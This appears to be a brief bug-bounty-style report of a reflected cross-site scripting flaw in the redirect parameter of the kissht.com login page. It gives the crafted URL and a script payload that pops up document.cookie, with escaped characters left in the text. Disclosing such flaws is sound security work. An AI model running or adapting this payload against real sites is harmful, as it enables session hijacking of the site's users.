Vulnerability Name : Cross Site Scripting \u000D\u000A\u000D\u000AVulnerable URL : https://kissht.com/login?redirect\u003Ddigi%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\u000D\u000A\u000D\u000AVulnerable Parameter : redirect\u000D\u000A\u000D\u000AVulnerable Payload : digi\u0022/\u003E\u003Cscript\u003Ealert(document.cookie)\u003C/script\u003E\u000D\u000A\u000D\u000AHow to reproduce this issue:\u000D\u000A\u000D\u000A1. Visit the url it will give an XSS popup.\u000D\u000A\u000D\u000Ahttps://kissht.com/login?redirect\u003Ddigi%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\u000D\u000A\u000D\u000A\u000D\u000APOC :\u000D\u000A\u000D\u000AScreenshort can be found in the attachment.